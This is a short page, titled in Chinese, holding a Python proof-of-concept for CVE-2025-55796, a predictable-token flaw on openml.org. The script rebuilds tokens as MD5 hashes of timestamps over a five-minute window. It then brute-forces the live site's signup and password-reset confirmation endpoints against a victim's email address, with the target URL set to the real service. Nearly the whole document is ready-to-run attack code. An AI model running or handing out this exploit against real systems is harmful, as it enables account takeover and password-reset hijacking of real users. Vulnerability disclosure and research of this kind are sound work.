CVE-2025-55796 openml.org 可预测令牌安全漏洞

#!/usr/bin/env python3 """ CVE-2025-55796 PoC - openml.org Predictable Token Generation This PoC demonstrates the token prediction vulnerability in openml.org """ import hashlib from datetime import datetime, timedelta import requests import itertools def generate_predictable_token(timestamp): """ Generate token using the vulnerable MD5-based timestamp hashing Format: MD5("%d %H:%M:%S") """ time_str = timestamp.strftime("%d %H:%M:%S") return hashlib.md5(time_str.encode()).hexdigest() def generate_token_candidates(start_time, end_time, step_seconds=1): """ Generate all possible tokens within a time window """ candidates = [] current = start_time while current <= end_time: token = generate_predictable_token(current) candidates.append((token, current)) current += timedelta(seconds=step_seconds) return candidates def brute_force_token(target_url, email, operation='signup', time_window_minutes=5): """ Brute force attack to find valid token Args: target_url: Base URL of openml.org email: Target user email operation: signup, password_reset, email_change time_window_minutes: Time window to search """ # Calculate time window end_time = datetime.now() start_time = end_time - timedelta(minutes=time_window_minutes) print(f"[*] Generating tokens for time window: {start_time} to {end_time}") candidates = generate_token_candidates(start_time, end_time) print(f"[*] Generated {len(candidates)} token candidates") # Try each token for token, timestamp in candidates: url = f"{target_url}/confirm/{operation}" params = { 'email': email, 'token': token } try: response = requests.get(url, params=params, timeout=5) # Check for successful confirmation if response.status_code == 200 and 'success' in response.text.lower(): print(f"[!] Valid token found: {token}") print(f"[!] Token generated at: {timestamp}") print(f"[!] {operation} confirmed successfully!") return token, timestamp except requests.exceptions.RequestException as e: print(f"[!] Request error: {e}") continue print("[-] No valid token found in time window") return None, None # Example usage if __name__ == "__main__": target = "https://openml.org" victim_email = "[email protected]" print("="*60) print("CVE-2025-55796 - openml.org Predictable Token PoC") print("="*60) # Attack scenarios brute_force_token(target, victim_email, 'signup', time_window_minutes=5) brute_force_token(target, victim_email, 'password_reset', time_window_minutes=5)